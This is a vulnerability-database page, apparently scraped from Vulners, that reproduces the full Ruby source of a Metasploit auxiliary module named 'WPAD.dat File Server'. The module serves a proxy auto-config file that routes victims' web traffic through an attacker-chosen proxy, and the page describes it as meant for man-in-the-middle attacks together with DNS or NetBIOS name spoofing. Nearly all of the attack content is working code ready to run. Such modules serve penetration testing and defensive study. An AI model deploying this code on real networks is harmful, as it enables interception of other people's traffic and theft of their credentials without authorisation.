Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WPAD.dat File Server

🗓️ 31 Aug 2024 00:00:00Reported by Efrain Torres, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 180 Views

Module for generating WPAD.dat file for WPAD MITM attacks. Requires privileges to open TCP port 80. Used in combination with DNS attacks or 'NetBIOS Name Service Spoofer' module.

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'WPAD.dat File Server',  
'Description' => %q{  
This module generates a valid wpad.dat file for WPAD mitm  
attacks. Usually this module is used in combination with DNS attacks  
or the 'NetBIOS Name Service Spoofer' module. Please remember as the  
server will be running by default on TCP port 80 you will need the  
required privileges to open that port.  
},  
'Author' =>  
[  
'et' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'DefaultOptions' =>  
{  
'SRVPORT' => 80  
},  
'Passive' => true))  
  
register_options(  
[  
OptAddress.new('EXCLUDENETWORK', [ true, "Network to exclude",'127.0.0.1' ]),  
OptAddress.new('EXCLUDENETMASK', [ true, "Netmask to exclude",'255.255.255.0' ]),  
OptAddress.new('PROXY', [ true, "Proxy to redirect traffic to", '0.0.0.0' ]),  
OptPort.new('PROXYPORT',[ true, "Proxy port", 8080 ])  
])  
  
deregister_options('URIPATH')  
end  
  
  
def on_request_uri(cli, request)  
vprint_status("Request '#{request.method} #{request.headers['user-agent']}")  
  
return send_not_found(cli) if request.method == "POST"  
  
html = <<-EOS  
function FindProxyForURL(url, host) {  
// URLs within this network are accessed directly  
if (isInNet(host, "#{datastore['EXCLUDENETWORK']}", "#{datastore['EXCLUDENETMASK']}"))  
{  
return "DIRECT";  
}  
return "PROXY #{datastore['PROXY']}:#{datastore['PROXYPORT']}; DIRECT";  
}  
EOS  
  
print_status("Sending WPAD config")  
send_response_html(cli, html,  
{  
'Content-Type' => 'application/x-ns-proxy-autoconfig'  
})  
end  
  
def resource_uri  
"/wpad.dat"  
end  
  
def primer  
hardcoded_uripath("/proxy.pac")  
end  
  
def run  
# This should probably be added to the Http mixin's run method  
begin  
exploit  
rescue Errno::EACCES => e  
if e.message =~ /Permission denied - bind/  
print_error("You need to have permission to bind to #{datastore['SRVPORT']}")  
else  
raise e  
end  
end  
end  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
wpad.datfile serverwpad mitmtcp port 80dns attacksnetbios name service spoofer
180